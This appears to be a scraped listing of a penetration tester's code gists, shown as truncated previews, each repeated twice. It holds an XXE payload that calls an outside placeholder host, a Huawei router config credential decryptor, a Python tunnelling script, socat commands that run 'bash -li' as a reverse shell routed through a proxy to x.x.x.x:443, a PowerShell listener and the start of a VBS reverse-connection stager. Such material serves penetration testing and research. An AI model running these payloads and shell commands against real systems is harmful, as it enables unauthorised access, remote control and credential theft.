Etienne Stalmans staaldraad

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## huaweiDecrypt.py
#!/usr/bin/python
"""
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
Will extract plain-text passwords and  crypted credentials. Huawei config files use DES encryption with
a known key. Using this information, the script will decrypt credentials found in the config file.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (12/01/2014)
"""

from Crypto.Cipher import DES

## webdavserv.go
package main

import (
	"flag"
	"fmt"
	"log"
	"net/http"
	"os"

	"golang.org/x/net/webdav"

## awk_netstat.sh
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp  | awk  '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'

# Local
grep -v "rem_address" /proc/net/tcp | awk  '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'

# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp  | awk 'function hextodec(str,ret,n,i,k,c){

## oauthServer.go
package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"strings"
)

## pyforw.py
#!/usr/bin/python
"""
   Python script to create a Connect-Connect tunnel. For those times ncat/socat can't be put on the box and python is available..
   Author: Etienne Stalmans <etienne@sensepost.com>
   Version: 1.0 (22_01_2015)
   Usage: python pyforw.py <targetIP> <targetPort> <jumpbox> <jumpboxPort>
          python pyforw.py 10.1.1.1 3389 179.0.0.100 8081
"""

from socket import *

## socat through proxy
# Listener on x.x.x.x:443:

socat file:`tty`,raw,echo=0 tcp-listen:443

# Reverse shell proxy server is at 10.10.10.1:8222:

socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"

## README.md

      
              3 files
            
          
              4 forks
            
          
              0 comments
            
          
              28 stars
            
          
                staaldraad
                / README.md
            
            
              Last active
              December 29, 2023 11:03
            
          
    Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/
Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:
--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
 version: '0'


## mini-reverse-listener.ps1

$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);

if($socket -eq $null){
	exit 1
}

$socket.start()
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"

## Command.vbs
Call X()
End Function

Dim RHOST: RHOST = "x.x.x.x"
Dim RPORT: RPORT = "8999"

Function Base64ToStream(b)
  Dim enc, length, ba, transform, ms
  Set enc = CreateObject("System.Text.ASCIIEncoding")
  length = enc.GetByteCount_2(b)
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#!/usr/bin/python
	"""
	Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
	Will extract plain-text passwords and crypted credentials. Huawei config files use DES encryption with
	a known key. Using this information, the script will decrypt credentials found in the config file.
	Author: Etienne Stalmans (etienne@sensepost.com)
	Version: 1.0 (12/01/2014)
	"""

	from Crypto.Cipher import DES
	package main

	import (
	"flag"
	"fmt"
	"log"
	"net/http"
	"os"

	"golang.org/x/net/webdav"
	# Gawk version
	# Remote
	grep -v "rem_address" /proc/net/tcp \| awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'

	# Local
	grep -v "rem_address" /proc/net/tcp \| awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'

	# No Gawk
	# Local
	grep -v "rem_address" /proc/net/tcp \| awk 'function hextodec(str,ret,n,i,k,c){
	package main

	import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"strings"
	)
	#!/usr/bin/python
	"""
	Python script to create a Connect-Connect tunnel. For those times ncat/socat can't be put on the box and python is available..
	Author: Etienne Stalmans <etienne@sensepost.com>
	Version: 1.0 (22_01_2015)
	Usage: python pyforw.py <targetIP> <targetPort> <jumpbox> <jumpboxPort>
	python pyforw.py 10.1.1.1 3389 179.0.0.100 8081
	"""

	from socket import *
	# Listener on x.x.x.x:443:

	socat file:`tty`,raw,echo=0 tcp-listen:443

	# Reverse shell proxy server is at 10.10.10.1:8222:

	socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
	socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"

	$socket = new-object System.Net.Sockets.TcpListener('127.0.0.1', 413);

	if($socket -eq $null){
	exit 1
	}

	$socket.start()
	$client = $socket.AcceptTcpClient()
	write-output "[*] Connection!"
	Call X()
	End Function

	Dim RHOST: RHOST = "x.x.x.x"
	Dim RPORT: RPORT = "8999"

	Function Base64ToStream(b)
	Dim enc, length, ba, transform, ms
	Set enc = CreateObject("System.Text.ASCIIEncoding")
	length = enc.GetByteCount_2(b)